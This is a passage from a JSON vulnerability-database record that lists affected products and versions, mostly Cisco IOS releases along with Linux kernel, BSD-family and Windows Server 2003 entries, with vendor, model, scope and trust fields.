          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(13\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(2\\)xf4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(25\\)ewa4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2bw"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(25\\)sg"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(11\\)yf4"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.30"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.18.2"
          },
          {
            "_id": null,
            "model": "openbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openbsd",
            "version": "2.4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(25\\)s1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(2\\)bx"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(14\\)yq3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3yj"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(11\\)yj"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(31\\)s1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3yr"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "2.0.5"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.19.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(12.02\\)t"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2t"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(26\\)e1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(25\\)seb3"
          },
          {
            "_id": null,
            "model": "bsd os",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "bsdi",
            "version": "4.2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3xt"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2mx"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "1.3.0"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2ye"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.3\\(7\\)db1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0db"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.4.33.4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(11\\)bc3c"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.0.13"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2tpc"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(20\\)w5\\(22b\\)"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "netbsd",
            "version": "1.5.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(3.6\\)w5\\(9.0.5\\)"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "4.1.1"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.4.29"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.4"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "4.6.2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1xu"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.66"
          },
          {
            "_id": null,
            "model": "bsd os",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "bsdi",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(23\\)sw"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(5\\)xe"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2yg"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(6.5\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(5\\)yf4"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.4.33.2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(19a\\)"
          },
          {
            "_id": null,
            "model": "openbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openbsd",
            "version": "3.6"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(3\\)xq"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.14"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(2\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1xz"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(15\\)jk5"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(5\\)ca1"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.22"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.11.10"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(5\\)t15"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(16\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(25\\)fy"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(15\\)zj2"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.69"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2ca"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3yd"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.11"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(14.5\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(14a\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(5\\)t12"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.15"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2yr"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(13\\)zc"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "10.3\\(16\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3yi"
          },
          {
            "_id": null,
            "model": "windows server 2003",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.20"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0xi"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(5\\)xn1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(19\\)b"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(5c\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(7\\)t9"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.20.10"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(5\\)yc1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1e"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3xf"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(15\\)bc2i"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.17.3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(2\\)xf"
          },
          {
            "_id": null,
            "model": "openbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openbsd",
            "version": "2.7"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(4\\)t3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2sw"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(17\\)sl"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3xi"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(9\\)"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.31"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(11\\)t8"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(8\\)xy4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4\\(6\\)t1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(13\\)s8"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(7\\)ja1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(15\\)zj3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(23\\)sz"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(24\\)s1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(6c\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.1\\(17\\)"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.22.4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1ga"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(12b\\)"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.28"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(7\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2ze"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.3\\(11d\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(24\\)s4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3b"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.29"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0xg"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.12.2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2xk"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2xt"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.1\\(36\\)ca2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(10\\)e4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(11\\)t3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(6\\)ea2"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.4.6"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.4.21"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(15\\)s3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2yq"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4\\(3\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(11\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(19\\)st2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(5.3\\)wc1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2n"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.2wa4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(4\\)ya10"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.0.32"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(1\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(7\\)ec"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2cx"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "netbsd",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(5\\)da1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(15.1\\)s"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(13a\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(10d\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(13b\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(2\\)t8"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.1\\(15\\)ia"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(22\\)s4"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.17.11"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.1\\(14\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2dd"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(11b\\)e"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(5\\)xr2"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.22"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.2\\(16\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(8\\)t"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(20\\)eu"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.1\\(7\\)"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.7"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(6\\)ea1a"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.38"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2yh"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(7.4\\)s"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.0.17"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.11.3"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.24"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "netbsd",
            "version": "1.6.1"
          },
          {
            "_id": null,
            "model": "catalyst blade switch 3120",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(50\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(16\\)"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.48"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(5a\\)b2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2xh"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2pb"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.1\\(12\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(20\\)sp1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(11\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(13\\)zk"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(28\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(8\\)yw2"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.32"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0xf"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(28c\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(4\\)xq1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(4\\)b2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(13\\)zh8"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(18.4\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(17a\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2sxd"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.2.25"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(23\\)sv1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(22\\)ea4a"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(2\\)xn"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "1.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(19\\)ew3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3yq"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.2\\(4\\)f"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(14\\)sy1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(13\\)mc1"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(25\\)sw4a"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(4\\)mx1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0xq"
          },
          {
            "_id": null,
            "model": "openbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openbsd",
            "version": "3.9"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(28\\)w5\\(31a\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
